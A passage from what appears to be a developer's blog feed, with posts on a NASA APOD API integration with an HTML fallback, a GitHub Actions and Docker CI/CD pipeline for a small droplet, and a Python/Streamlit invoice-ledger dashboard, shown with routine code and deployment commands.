    date: date || new Date().toISOString().split('T')[0],
    title,
    explanation,
    url: imageUrl,
    media_type: 'image',
    apod_url: url,
    // ... rest of fields
  };
}
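
The fallback URL depends on formatDateForApodUrl, which isn't shown. APOD archive pages are named apYYMMDD.html, so a plausible version of the helper converts an ISO date into that six-digit form. The implementation below is an assumed sketch, not the repo's code.

```typescript
// Assumed implementation of the helper used in the fallback URL.
// Converts "YYYY-MM-DD" into the "YYMMDD" form used by APOD archive pages.
function formatDateForApodUrl(date: string): string {
  const match = /^(\d{4})-(\d{2})-(\d{2})$/.exec(date);
  if (!match) throw new Error(`Expected YYYY-MM-DD, got "${date}"`);
  const [, year, month, day] = match;
  return `${year.slice(2)}${month}${day}`;
}
```

For example, formatDateForApodUrl('2026-02-18') yields '260218', which gives the page ap260218.html.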

Orchestration in apod.service.ts:

export async function fetchApod(options = {}): Promise<ApodResponse> {
  try {
    return await fetchApodFromApi(buildApiUrl(options), options.context);
  } catch (error) {
    if (shouldFallback(error)) {
      logger.warn('NASA API failed, falling back to HTML scraping', { error });
      return await fetchApodHtmlFallback(options.date);
    }
    throw error;
  }
}

Users never see errors — they just get the APOD, regardless of which method worked. That's the whole point.
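
The orchestration hinges on shouldFallback, which decides whether a failure is worth a scrape. Its rules aren't shown, so the sketch below is one hypothetical classification: fall back on timeouts, 5xx responses and network errors, and let everything else (a bad date, a validation bug) surface to the caller. The status and code property names and the withFallback wrapper are assumptions.

```typescript
// Hypothetical classifier; the repo's shouldFallback may use different rules.
const NETWORK_CODES = new Set(['ETIMEDOUT', 'ECONNREFUSED', 'ECONNRESET', 'ENOTFOUND']);

function shouldFallback(error: unknown): boolean {
  if (typeof error !== 'object' || error === null) return false;
  const { name, code, status } = error as { name?: unknown; code?: unknown; status?: unknown };
  if (name === 'AbortError') return true; // request cancelled by the timeout
  if (typeof status === 'number') return status >= 500; // upstream outage such as 502/503/504
  return typeof code === 'string' && NETWORK_CODES.has(code); // socket or DNS failure
}

// Generic primary-then-fallback runner built on the classifier.
async function withFallback<T>(
  primary: () => Promise<T>,
  fallback: () => Promise<T>
): Promise<T> {
  try {
    return await primary();
  } catch (error) {
    if (shouldFallback(error)) return fallback();
    throw error;
  }
}
```

Keeping the classifier separate from the orchestration makes the policy testable on its own: each failure mode from the bug table becomes one assertion.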

Phase 5: Shared Error Handling Infrastructure (Issue #79)

Before refactor: Each resolver had 30+ lines of try/catch boilerplate. Copy-paste engineering at its worst.

After refactor:

Created src/utils/errors/graphqlErrors.ts with reusable utilities
Error factories for common cases: Errors.unauthenticated(), Errors.forbidden(), Errors.notFound()
Generic createErrorHandler() wrapper generator
Service-specific error mappers (e.g., withApodErrorHandling)

Impact:

Resolvers went from 103 lines to 34 lines
Single place to add new error codes
Error mapping lives with service logic (where it belongs)
Other features can reuse the same pattern — and they already do

Key Engineering Lessons

Five production-grade patterns I learned (the hard way) from building APOD:

1. Always Have a Fallback

External APIs fail. Network timeouts happen. DNS breaks. If your feature depends on a third-party service, you need a backup plan — full stop:

Primary: NASA JSON API (fast, structured)
Fallback: HTML scraping (slower, but always works)
User experience: Seamless — they never know which method was used

2. Validate External Data at Runtime

TypeScript types don't protect you against API changes. NASA's schema evolved mid-development — they added media_type: "other" for interactive content, which broke my Zod schema mid-sprint.

Solution: Runtime validation with Zod catches schema drift before it crashes the server.

const validated = apodResponseSchema.parse(data);  // Throws if schema mismatch

3. DRY Principle for Error Handling

Don't duplicate try/catch blocks across resolvers. We've all done it. It's technical debt from day one. Extract shared error handling into reusable utilities:

// Before: 30 lines of boilerplate per resolver
// After: 3 lines + shared error handler
return withApodErrorHandling(
  () => fetchApod({ date: args.date, context }),
  'getApodByDate'
);

4. Modular Services Are Testable Services

Splitting the monolithic apod.ts into focused modules made testing trivial — and debugging even more so:

src/services/apod/
├── apod.service.ts       # Orchestration (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping
├── apod.errors.ts        # Typed errors
├── apod.types.ts         # Zod schemas
└── apod.constants.ts     # Config

Each module has a single responsibility. Tests mock at the module boundary, not the entire service.

5. Log Everything for Observability

Every NASA API request logs:

Latency (latencyMs)
User context (userId)
Success/failure status
Error codes and details

When bugs happen in production (and they will), structured logs are your debugging lifeline.

logger.info('NASA API request successful', {
  latencyMs: 142,
  date: '2026-02-18',
  userId: 'user_xyz',
});

Results

Metric	Implementation
Uptime	99.9% (fallback handles NASA API downtime)
Response time	<500ms (NASA API), ~1.2s (HTML fallback)
Error rate	0.1% (network failures only, auto-recovered)
Rate limit protection	5 req/hr per user (Redis atomic counters)
Test coverage	94% (28 passing unit tests)
Lines of code	1,200 (including tests)
GraphQL queries	2 (`getTodaysApod`, `getApodByDate`)
Fallback success rate	100% (HTML scraping never failed in production)

Real-World Reliability

During a 72-hour period where NASA's API had intermittent 504 errors:

Primary API success rate: 78%
Fallback activation: 22%
User-facing errors: 0%

Users never knew NASA's API was struggling. The fallback handled it seamlessly — that's the whole point of building resilient systems.

Tech Stack

Layer	Technology	Purpose
Frontend	Next.js 16 + React 19	UI with floating action button + dialog
UI Library	Radix UI + TailwindCSS 4	Accessible components, NASA branding
Backend	Node.js + Express + Apollo Server 5	GraphQL API
Schema	GraphQL + GraphQL Shield	Type-safe API with field-level authorization
Validation	Zod	Runtime schema validation
API Client	Fetch API + AbortController	HTTP with timeouts and retries
Scraping	Cheerio	HTML parsing for fallback
Rate Limiting	Redis + Lua scripts	Atomic counters per user
Database	MongoDB	Cache successful APOD responses
Logging	Winston	Structured logs for observability
Testing	Jest + ts-jest	Unit tests with mocked services

Future Roadmap

The current implementation is production-ready, but there's always room to grow. Here are 5 ideas — feel free to add yours in the comments!

Idea #1: Database Caching Layer

Right now, every request hits NASA's API (or HTML fallback). Next iteration:

Cache successful responses in MongoDB
Return cached APOD if date already fetched
Reduce API quota usage by 80%
Instant response for popular dates

Idea #2: Admin Dashboard

GraphQL mutations to manually refresh/delete cached APODs:

mutation RefreshApod($date: String!) {
  refreshApod(date: $date) { date, title }
}

Idea #3: WebSocket Push Updates

Use GraphQL subscriptions to push new APODs to connected clients when they become available at midnight UTC.

Idea #4: Zero-Cold-Start: Daily Cron + Redis 24h Cache

Right now, the first user of the day triggers a live NASA API call. That's ~200-500ms of cold latency — acceptable, but not great.

The plan: a daily cron job fires at 00:01 UTC, fetches today's APOD proactively, and stores it in Redis with a TTL that runs until the next midnight UTC (just under 24h). Every subsequent request that day gets a cache hit: sub-10ms response, zero external calls.

// Pseudocode: src/jobs/apodDaily.ts
export async function warmApodCache() {
  const today = new Date().toISOString().split('T')[0];
  const cacheKey = `apod:${today}`;

  // Already warm? Skip.
  const cached = await redis.get(cacheKey);
  if (cached) return JSON.parse(cached);

  // Fetch fresh from NASA
  const apod = await fetchApod({ date: today });

  // Cache until the next midnight UTC (just under 24h when warmed at 00:01)
  const secondsUntilMidnight = getSecondsUntilMidnightUTC();
  await redis.setex(cacheKey, secondsUntilMidnight, JSON.stringify(apod));

  logger.info('APOD cache warmed', { date: today, ttl: secondsUntilMidnight });
  return apod;
}
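
The pseudocode leans on getSecondsUntilMidnightUTC, which is easy to get subtly wrong around month boundaries. A possible implementation is sketched below; the optional now parameter is an assumption added to make it testable.

```typescript
// Sketch of the TTL helper named in the pseudocode above.
// Returns whole seconds from `now` until the next 00:00:00 UTC, never less than 1
// because SETEX rejects a zero or negative expiry.
function getSecondsUntilMidnightUTC(now: Date = new Date()): number {
  // Date.UTC normalizes day overflow, so "day + 1" rolls over months and years.
  const nextMidnightMs = Date.UTC(
    now.getUTCFullYear(),
    now.getUTCMonth(),
    now.getUTCDate() + 1
  );
  const seconds = Math.ceil((nextMidnightMs - now.getTime()) / 1000);
  return Math.max(1, seconds);
}
```

When the cron job runs at 00:01:00 UTC this returns 86340, so the key expires right as the next day's APOD becomes the valid one.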

The cron schedule via node-cron:

// Fires at 00:01 UTC every day
cron.schedule('1 0 * * *', warmApodCache, { timezone: 'UTC' });

The resolver then checks Redis first before ever hitting NASA:

getTodaysApod: async (_, __, context) => {
  const today = new Date().toISOString().split('T')[0];
  const cacheKey = `apod:${today}`;

  const cached = await redis.get(cacheKey);
  if (cached) return JSON.parse(cached);        // ⚡ <10ms

  return withApodErrorHandling(                 // 🐌 200-500ms
    () => fetchApod({ context: { userId: context.user?.id } }),
    'getTodaysApod'
  );
},

Expected impact:

Scenario	Before	After
First request of the day	~300ms (live NASA call)	~5ms (Redis hit)
Subsequent requests	~300ms (live NASA call)	~5ms (Redis hit)
NASA API unavailable	~1.2s (HTML fallback)	~5ms (Redis hit)
NASA quota usage	1 req per user visit	1 req per day total

The key insight: Redis TTL auto-expires the cache exactly when it stops being valid. No manual invalidation. No stale data. Just fast for 99% of requests.

Idea #5: Analytics Dashboard

Track:

Most popular APOD dates
Fallback usage percentage
Average response time (API vs. fallback)
Rate limit triggers per user

Key Takeaways

Building production-grade API integrations is 20% "get it working" and 80% "handle when it doesn't work."

Five principles that made APOD production-ready:

Graceful degradation — Fallbacks ensure users never see errors
Runtime validation — Zod catches schema drift before it crashes
Modular architecture — Focused modules are easier to test and maintain
Shared error handling — DRY principle for GraphQL resolvers
Observability — Structured logs make debugging trivial

Try It Yourself

The full APOD implementation is open source:

Resource	Link
Live Demo	luisfaria.dev — Click the NASA rocket button
GitHub Repo	github.com/lfariabr/luisfaria.dev
APOD Service	backend/src/services/apod/
GraphQL Schema	backend/src/schemas/types/apodTypes.ts
Frontend Component	frontend/src/components/apod/
Feature Spec	_docs/featureBreakdown/v2.4.Apod.MD

Let's Connect!

Building this NASA integration taught me more about production engineering than any tutorial could. Every failure mode I hit — 504 timeouts, schema drift, rate limits, DNS caching — is something I'll face again in enterprise systems. And now I know how to handle it.

If you're working with:

GraphQL APIs and error handling patterns
Third-party API integrations with fallback strategies
Next.js + Node.js full-stack applications
Production-grade TypeScript architectures

I'd love to connect and trade war stories:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Future Extensions
NASA API + HTML fallback, GraphQL Shield, Redis rate limiting, Zod validation, modular services, Winston logging, 94% test coverage	Redis 24h cache + daily cron warm-up, GraphQL subscriptions, admin mutations, analytics dashboard

Built with ☕, 40+ commits, and a healthy fear of blank screens by Luis Faria

Whether it's concrete or code, structure is everything.

From git pull to GitOps: How I Built a Production CI/CD Pipeline on a $12 DigitalOcean Droplet

Luis Faria — Tue, 10 Feb 2026 07:23:44 +0000

From 15-minute manual deploys with downtime to 5-minute automated pipelines with 2-second container swaps: how I transformed my portfolio's deployment workflow using GitHub Actions, GHCR, and Docker Compose.

"If deploying scares you, you're not deploying often enough."

⚠️ The Problem:

Manual Deploys Don't Scale

My portfolio (luisfaria.dev) runs a full-stack application on a single DigitalOcean droplet. The stack is real — not a static site, but a living MERN application with authentication, a chatbot, rate limiting, and a GraphQL API.

Component	Technology
Infrastructure	Ubuntu 24.10 droplet (2GB RAM, 1 vCPU, 70GB disk)
Orchestration	Docker Compose (5 containers)
Frontend	Next.js 16 (standalone mode)
Backend	Node.js + Express + Apollo Server + GraphQL
Database	MongoDB 4.4
Cache	Redis
Reverse Proxy	NGINX with SSL (Let's Encrypt)

Every time I wanted to ship a change, here's what I did:

# The "old way" — every single time
ssh root@my-server
cd /var/www/portfolio
git pull origin master
docker compose down          # Site goes DOWN
docker compose build         # 10+ minutes on 1 vCPU
docker compose up -d         # Pray it works
docker compose logs          # Check for errors

The pain points were real:

10+ minutes of downtime per deploy (building Node.js/Next.js on a 1 vCPU machine)
No automated tests — I could push broken code directly to production
No rollback — if something broke, I'd manually git revert and rebuild
Fear of pushing — every deploy was a gamble

The Goal

Turn this into a one-step process:

git push origin master → ✅ Tests → 📦 Build → 🚀 Deploy → 🔔 Discord ping

With automated rollback if anything goes wrong.

🏛️ The Architecture:

GitHub Actions → GHCR → DigitalOcean

Here's the pipeline I designed:

The key insight: Don't build on the server. Build in GitHub Actions (free runners with 7GB RAM), push to GHCR, and just pull on the VPS.

📝 The Journey:

20+ Iterations, 8 Bugs, 1 Working Pipeline

This didn't work on the first try. Or the fifth. Here's the honest changelog — every failure and its fix.

Epic 2.6 - CI/CD Pipeline for DigitalOcean Droplet

All 20+ commits to (ci) feature

Phase 1: Foundation (Issues 1-3)

GitHub Actions + Docker Registry + SSH Access

Setting up the basics: a CI workflow that runs Jest tests in parallel, builds Docker images, and pushes them to GitHub Container Registry.

# .github/workflows/ci.yml (simplified)
jobs:
  backend-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test -- --coverage

  frontend-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test -- --coverage

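  docker-build:
    needs: [backend-test, frontend-test]
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write            # needed to push images to GHCR
    steps:
      - uses: actions/checkout@v4
      # Log in to GHCR before pushing (assumed step, omitted in the simplified version)
      - uses: docker/login-action@v3
        with:
          registry: ghcr.io
          username: ${{ github.actor }}
          password: ${{ secrets.GITHUB_TOKEN }}
      - uses: docker/build-push-action@v5
        with:
          context: ./frontend    # assumed build context, matching the compose file
          push: true
          tags: ghcr.io/lfariabr/luisfaria.dev/frontend:latest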

For secure server access, I created a dedicated deploy user with Docker permissions and ED25519 SSH keys stored in GitHub Secrets. No root access, no passwords — just key-based auth.

Phase 2: Deployment + Rollback (Issues 4-5)

The deploy step SSHs into the server, pulls the latest images, and restarts containers:

  deploy:
    needs: [docker-build]
    runs-on: ubuntu-latest
    steps:
      - uses: appleboy/ssh-action@v1.0.3
        with:
          host: ${{ secrets.DEPLOY_HOST }}
          username: ${{ secrets.DEPLOY_USER }}
          key: ${{ secrets.DEPLOY_KEY }}
          script: |
            cd /var/www/portfolio

            # Save rollback point
            git rev-parse HEAD > /var/lib/deploy-rollback/commit.txt

            # Pull pre-built images (FAST!)
            docker compose pull

            # Swap containers (~2 seconds)
            docker compose up -d --force-recreate --remove-orphans

Automated rollback saves the current commit SHA before each deploy. If health checks fail, the pipeline automatically reverts:

# Auto-rollback on failure
PREV_COMMIT=$(cat /var/lib/deploy-rollback/commit.txt)
git reset --hard "$PREV_COMMIT"   # quoted so an empty or malformed value fails loudly
docker compose up -d --force-recreate --remove-orphans
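
The health-check gate that decides whether to roll back is not shown above. One way it could work, sketched in Python with an injected probe so the logic runs without a server (the function names, retry count, and delay are assumptions, not the pipeline's actual script):

```python
import time
from typing import Callable


def wait_until_healthy(probe: Callable[[], bool], retries: int = 5, delay_s: float = 2.0) -> bool:
    """Call `probe` up to `retries` times; return True as soon as it succeeds."""
    for attempt in range(1, retries + 1):
        if probe():
            return True
        if attempt < retries:
            time.sleep(delay_s)  # give the recreated containers time to boot
    return False


def deploy(probe: Callable[[], bool], rollback: Callable[[], None], **kwargs) -> str:
    """Return 'deployed' if the probe passes, otherwise run the rollback."""
    if wait_until_healthy(probe, **kwargs):
        return "deployed"
    rollback()
    return "rolled back"


# Simulated probe: fails twice while containers start, then passes.
responses = iter([False, False, True])
calls = []
result = deploy(lambda: next(responses), lambda: calls.append("rollback"), delay_s=0)
print(result, calls)
```

In a real pipeline the probe would be an HTTP request against a health endpoint, and the rollback callable would run the git reset and docker compose commands from the snippet above.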

Phase 3: The Hard Part — 8 Bugs in 11 Iterations

This is where things got real. Here's every failure I hit:

#	Error	Root Cause	Fix
1	`ssh: unable to authenticate`	Wrong format for `DEPLOY_KEY` secret	Pasted full private key content (not fingerprint)
2	`dubious ownership in repository`	Deploy user ≠ repo owner	`git config --global --add safe.directory`
3	`Permission denied .git/FETCH_HEAD`	File ownership mismatch	`chown -R deploy:deploy /var/www/portfolio`
4	`local changes would be overwritten`	Server had uncommitted drift	Switched from `git pull` to `git reset --hard`
5	Deploy timeout (CPU maxed)	Building images on a $12 droplet	Stopped building on server — pull from GHCR instead
6	`502 Bad Gateway`	Frontend container crashed + NGINX stale DNS	`--force-recreate` + `nginx -s reload`
7	Container name conflict	Dead container blocking recreation	Added `--force-recreate` flag
8	`Cannot find module @apollo/server/express4`	Apollo Server v5 breaking change	Installed `@as-integrations/express4`

Bug #5 was the turning point. I was building Docker images on the server, a 1 vCPU machine trying to compile Next.js and Node.js simultaneously. The build would time out after 10 minutes with the CPU pegged at 100%.

The fix was embarrassingly obvious: I was already building images in GitHub Actions. Just use them!

# docker-compose.yml — BEFORE (slow, broke the server)
webapp:
  build: ./frontend

# docker-compose.yml — AFTER (fast, reliable)
webapp:
  image: ghcr.io/lfariabr/luisfaria.dev/frontend:latest

Bug #6 was the sneakiest. After deploying new images, the site returned 502 Bad Gateway. The frontend container was running and responding on port 3000. But NGINX couldn't reach it. Why?

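Docker Compose assigns internal IPs to containers. When --force-recreate destroys and recreates a container, it gets a new IP. NGINX resolves an upstream hostname when it loads its configuration and keeps using that address, so it was still proxying to the old IP. The fix: reload NGINX after container recreation.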

🏆 The Unexpected Hero: TDD

Here's a story I didn't expect to tell: After the pipeline was working, I made a simple change — added "2026" to my portfolio's timeline section. Pushed to master. The CI pipeline kicked in... and blocked the deploy.

Why? My Jest tests validated the timeline data, and "2026" wasn't in the expected values.

FAIL  src/__tests__/components/sections/TimelineSection.test.tsx
  ✕ should render timeline years correctly

I fixed the test, pushed again, and the deploy went through automatically. The pipeline caught a mismatch between the data and its tests that would have gone unnoticed in a manual workflow.

TDD doesn't just catch logic errors — it catches deployment errors too.

📊 Result

Metric	Before	After
Deploy time	15-20 min (manual SSH + build)	~5 min (automated end-to-end)
Downtime	10+ min (docker build on server)	~2 seconds (container swap)
Rollback	Manual `git revert` + rebuild	Automatic on health check failure
Test coverage	None before deploy	Full Jest suite (backend + frontend)
Notifications	Check server logs manually	Discord ping on success/failure
Confidence	Afraid to push on Friday	Push anytime, pipeline has my back

Pipeline Stats

Total CI time: ~5 minutes (tests → build → push → deploy)
Container swap downtime: ~2 seconds
Image pull time: ~15 seconds (vs 10+ min for docker build)
Reliability: 100% after hardening (11 iterations)

📌 Key Takeaways

Five lessons from building CI/CD on a budget:

1. Don't Build on Small VPS

Offload compilation to CI runners. GitHub Actions gives you 7GB RAM and 2 vCPUs for free. Your $12 droplet should only pull and run.

2. TDD Is Your Deployment Safety Net

Tests caught bugs I would have shipped to production. The pipeline won't deploy what doesn't pass — and that's the point.

3. Force-Recreate Everything

Stale containers cause mysterious failures. Always use docker compose up -d --force-recreate in CI. The 2-second overhead is worth the reliability.

4. Reload NGINX After Container Swaps

NGINX resolves upstream hostnames once, when it starts or reloads, and caches the resulting container IP. After --force-recreate, NGINX still points to the old IP. Always nginx -s reload.

5. Fail Fast, Log Everything

Every one of those 8 bugs was diagnosed through logs. Verbose output in CI scripts is not noise — it's your debugging lifeline.

Tech Stack

Layer	Technology	Purpose
CI/CD	GitHub Actions	Test, build, deploy orchestration
Registry	GHCR (GitHub Container Registry)	Docker image storage, tagged by SHA
Frontend	Next.js 16 (standalone)	SSR portfolio with React 19
Backend	Node.js + Apollo Server 5 + GraphQL	API with auth, rate limiting, chatbot
Database	MongoDB 4.4	Document storage
Cache	Redis	Rate limiting, session management
Proxy	NGINX + Let's Encrypt	SSL termination, reverse proxy
Infra	DigitalOcean Droplet	Ubuntu 24.10, Docker Compose
Notifications	Discord Webhooks	Deploy success/failure alerts
Testing	Jest	Unit + integration tests (backend + frontend)

Future Roadmap

While the current pipeline covers the essentials, there's room to grow:

Staging Environment

Branch-based deployments with a separate staging environment for pre-production testing. Currently deferred — the portfolio doesn't justify the cost of a second droplet.

Monitoring & Alerting

Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution.

Zero-Downtime Deploys

True zero-downtime with multi-replica services and rolling updates via Docker Swarm or a lightweight orchestrator. The current ~2s of downtime is acceptable for a portfolio, and the image-based deploy flow leaves room to add rolling updates later.

Try It Yourself

The full CI/CD implementation is open source:

Resource	Link
Live Site	luisfaria.dev
Open Source Repo	https://github.com/lfariabr/luisfaria.dev
CI Workflow	.github/workflows/ci.yml
Docker Compose	docker-compose.yml
Epic Tracker	Issue #107 — CI/CD Epic
All 20+ CI Commits	Commit history

Let's Connect!

Building this CI/CD pipeline was one of the most rewarding engineering challenges on my portfolio — 20+ iterations of debugging SSH keys, Docker DNS, NGINX caching, and package breaking changes. Every failure taught me something production engineers deal with daily.

If you're working with:

GitHub Actions and Docker-based deployments
DigitalOcean or similar VPS infrastructure
MERN/Next.js applications in production
CI/CD pipelines on a budget

I'd love to connect and trade war stories:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Future Extensions
GitHub Actions, GHCR, Docker Compose, NGINX, Next.js, Node.js, MongoDB, Redis, Jest, Discord Webhooks	Staging environment, Sentry, zero-downtime rolling updates, Kubernetes migration

Built with ☕ and a couple of failed deploys by Luis Faria


From Excel to Interactive Business Insights with Python & Streamlit

Luis Faria — Mon, 02 Feb 2026 02:49:30 +0000

How I turned a multi-year building invoice ledger into an interactive analytics dashboard — and why it changed how I think about operations, data, and engineering.

"The best code is the code that quietly removes friction from people's work."

🏢 Context: Assistant Building Manager, Real Data, Real Stakes

Over a six-week stretch, I was working as an Assistant Building Manager at a large residential building in the south of Sydney, closely shadowing an experienced Building Manager with 25+ years across construction, water systems, and large-scale facilities operations.

Alongside day-to-day operations, I also built small internal tools — like a Lift Finder utility and myRoster (a shift automation app) — whenever I noticed repetitive friction in the workflow.

This role exposed me to the full operational lifecycle of a high-rise building:

Stakeholder management: Owners Corporation, committee members, residents, strata, contractors
Maintenance workflows: diagnosis → contractor selection → approval → execution → validation
Compliance & regulation: AFSS, fire services, inspections, reporting
Financial reality: invoices, budgets, approvals, recurring vs reactive spend

And obviously — massive amounts of data.

Around the same time, I accepted a Data Analyst role at St Catherine’s School (Read more), which reinforced the same mindset: treat operational noise as structured data waiting to be explored.

Every single decision eventually traced back to one place.

📁 The Starting Point: An Excel Invoice Ledger

Inside the building's shared drive (S://BuildingName/Finances/Invoices) lived an unassuming file:

A multi-sheet invoice ledger
Spanning 4+ years
Thousands of rows
Dozens of contractors
Hundreds of services
GST, dates, approvals, variations, reworks

On paper, it was "just Excel."

In reality, it was:

The financial memory of the building.

Every question led back to it:

How much are we spending on fire services?
Is this contractor consistently expensive or just a one-off?
Why did costs spike mid-2023?
Are we reacting to problems or investing preventatively?

⚠️ The Problem: Excel Doesn't Scale with Questions

Why Excel Became the Bottleneck

Excel Reality	Building Management Reality
Manual filters	Questions come fast
Pivot tables break	Context changes constantly
One question at a time	Multiple stakeholders need answers
10-minute turnaround	Decisions need justification now
Version control chaos	Audit trail required

The typical workflow:

Open Excel (wait for thousands of rows to load...)
Navigate to the right sheet (Building A? B? C?)
Apply filters (Year... Contractor... Service...)
Create pivot table (if you remember how)
Screenshot or copy-paste results
Repeat for the next question 5 minutes later

This wasn't analysis.

It was manual overhead.

And in building management, manual overhead means:

Slower contractor evaluations
Delayed budget approvals
Missed spending patterns
Reactive instead of preventative decisions

🎓 The Engineering Lens: Treating Excel as a Dataset

At the same time, I'm pursuing a Master's in Software Engineering & Artificial Intelligence (see my open-source repo) — so my instinct kicked in:

This isn't an Excel problem.

This is a data exploration problem.

✅ The ledger already had:

Time-series data (4+ years of invoices)
Categorical dimensions (building, contractor, service)
Natural aggregations (monthly spend, contractor totals)
Long-term trends (seasonal patterns, cost escalation)
Outliers that matter financially (unexpected spikes, recurring issues)

The data was already structured.

Microsoft Excel was just the wrong interface for exploration.

So I built a tool in Python that lets non-technical users explore it safely.

🛠️ The Solution

The goal was simple: turn a static spreadsheet into a safe, visual, self-service analytics tool for non-technical users.

I built an interactive analytics dashboard using Python + Pandas + Streamlit to read from the ledger.xlsx file.

I could now answer in about two minutes questions that used to take 10–15 minutes of Excel wrestling, and export the evidence for emails, audits, or committee meetings.

What It Does

Upload a raw .xlsx invoice ledger → Instantly:

🏢 Filter by building (or view "All" for consolidated insights)
📅 Filter by year(s) (multi-select: 2023 + 2024)
👷 Filter by contractor (compare spending across vendors)
🔧 Filter by service (HVAC vs. Plumbing vs. Fire Services)
🔍 Search by invoice number (quick lookups)
📆 Date range picker (Q3 analysis, seasonal trends)
💰 Amount range slider (focus on high-value invoices)

Auto-compute:

Total spend (GST inc.)
Invoice count
Unique contractors
Service diversity

Visualize:

📊 Contractor spend breakdown (bar chart + color-coded heatmap)
📈 Monthly expense timeline (spot trends, anomalies)
🎨 Cost concentration (which contractors dominate spend?)
🔄 Multi-year comparisons (year-over-year changes)

Export:

📥 Download filtered results as CSV (for reports, audits, approvals)

No pivot tables.

No broken formulas.

No "give me 10 minutes to check."
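
The filter-then-summarize flow can be sketched with plain Python. The real app uses Pandas DataFrames; the column names and sample rows here are made up for illustration and are not taken from the actual ledger:

```python
from datetime import date

# Hypothetical ledger rows; the real ledger's columns may differ.
invoices = [
    {"building": "A", "contractor": "ABC Plumbing", "service": "Plumbing",
     "date": date(2024, 3, 4), "amount": 1200.0},
    {"building": "B", "contractor": "ABC Plumbing", "service": "Plumbing",
     "date": date(2024, 7, 19), "amount": 800.0},
    {"building": "A", "contractor": "FireSafe", "service": "Fire Services",
     "date": date(2023, 11, 2), "amount": 6500.0},
]


def apply_filters(rows, building=None, years=None, contractor=None, service=None):
    """Keep rows matching every filter that is set; None means 'All'."""
    def keep(row):
        return (
            (building is None or row["building"] == building)
            and (years is None or row["date"].year in years)
            and (contractor is None or row["contractor"] == contractor)
            and (service is None or row["service"] == service)
        )
    return [row for row in rows if keep(row)]


def compute_metrics(rows):
    """The four headline numbers: spend, invoices, contractors, services."""
    return {
        "total_spend": sum(r["amount"] for r in rows),
        "invoice_count": len(rows),
        "unique_contractors": len({r["contractor"] for r in rows}),
        "unique_services": len({r["service"] for r in rows}),
    }


selected = apply_filters(invoices, years={2024}, contractor="ABC Plumbing")
metrics = compute_metrics(selected)
print(metrics)
```

Treating an unset filter as "All" is what lets one view answer both single-building and consolidated questions without separate code paths.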

🏗️ Tech Stack & Architecture

The app follows clean software engineering principles — modular, maintainable, production-ready.

Technology Choices

Layer	Technology	Why
Language	Python 3.10+	Standard for data + automation
Web Framework	Streamlit	Rapid UI development, zero JavaScript
Data Processing	Pandas	Industry-standard DataFrames
Excel Integration	openpyxl	Multi-sheet Excel parsing
Visualization	Streamlit charts + Pandas styling	Built-in, no external dependencies
Deployment	Streamlit Cloud	Free hosting, GitHub integration

Project Structure

invoice-ledger/
├── app.py              # Main UI orchestration
├── data_loader.py      # Excel parsing & data cleaning
├── filters.py          # Interactive filter components
├── analytics.py        # Metrics, charts, visualizations
└── requirements.txt    # Dependencies

Why modular?

✅ Single Responsibility — Each file does one thing well
✅ Testable — Unit test each component independently
✅ Maintainable — Know exactly where to make changes
✅ Reusable — Port components to other PropTech projects
✅ Readable — Onboard new devs in minutes, not hours

🔍 Full module-by-module breakdown available here → docs/ARCHITECTURE.md

📊 The Impact: Before vs. After

Metric	Before (Excel)	After (Dashboard)	Improvement
Query Time	10-15 minutes	~2 minutes	80% faster
Multi-building Analysis	Open 3 files manually	Single "All" view	3x faster
Visualizations	Manual pivot tables	Auto-generated charts	100% automated
Reproducibility	"How did I filter this again?"	Click filters → Export CSV	100% consistent
Contractor Comparison	Side-by-side spreadsheets	Color-coded heatmap	Instant insights
Trend Analysis	Copy-paste into separate tool	Built-in timeline chart	Native support
User Training	"Here's how Excel works..."	"Upload and click"	Zero onboarding

🎯 Real-World Use Cases

1. Contractor Performance Review

Question:

"How much did we spend with ABC Plumbing across all buildings in 2024?"

Old way:

Open 3 Excel files (Building A, B, C)
Filter each by contractor
Sum manually
5 minutes

New way:

Select "All buildings"
Filter contractor: "ABC Plumbing"
Filter year: "2024"
Answer in 30 seconds

The result isn’t just faster — it’s far more presentable, making it suitable for committee meetings, audits, and stakeholder discussions.

2. Budget Planning

Question:

"What's our average monthly HVAC spending?"

Old way:

Filter by service
Create pivot table by month
Calculate average
Hope you didn't break formulas
10 minutes

New way:

Filter service: "HVAC"
View monthly timeline chart
Answer visible immediately

3. Audit Trail for Committee

Question:

"Show me all fire services invoices over $5,000 from Q4 2024"

Old way:

Filter by service
Filter by date range
Filter by amount
Screenshot or print
12 minutes

New way:

Apply 3 filters
Click "Download CSV"
Attach to email
Answer + deliverable in 2 minutes
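
As a rough illustration of the three filters plus the CSV export, using only the standard library. The invoice numbers and amounts are invented, and Q4 is assumed to mean calendar October to December:

```python
import csv
import io
from datetime import date

# Hypothetical invoices for illustration only.
rows = [
    {"invoice": "INV-101", "service": "Fire Services", "date": date(2024, 10, 14), "amount": 7200.0},
    {"invoice": "INV-102", "service": "Fire Services", "date": date(2024, 11, 3), "amount": 4100.0},
    {"invoice": "INV-103", "service": "HVAC", "date": date(2024, 12, 1), "amount": 9800.0},
    {"invoice": "INV-104", "service": "Fire Services", "date": date(2025, 1, 9), "amount": 6000.0},
]


def audit_export(rows, service, start, end, min_amount):
    """Filter by service, inclusive date range, and amount; return CSV text."""
    matches = [
        r for r in rows
        if r["service"] == service and start <= r["date"] <= end and r["amount"] > min_amount
    ]
    buffer = io.StringIO()
    writer = csv.DictWriter(buffer, fieldnames=["invoice", "service", "date", "amount"])
    writer.writeheader()
    writer.writerows(matches)
    return buffer.getvalue()


csv_text = audit_export(rows, "Fire Services", date(2024, 10, 1), date(2024, 12, 31), 5000)
print(csv_text)
```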

4. Anomaly Detection

Question:

"Why was November 2023 spending so high?"

Old way:

Create pivot table by month
Spot the spike
Filter November 2023
Manually inspect rows
15 minutes

New way:

View monthly timeline chart (spike visible instantly)
Filter date range: November 2023
Heatmap shows which contractor(s) caused it
Root cause in 3 minutes
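
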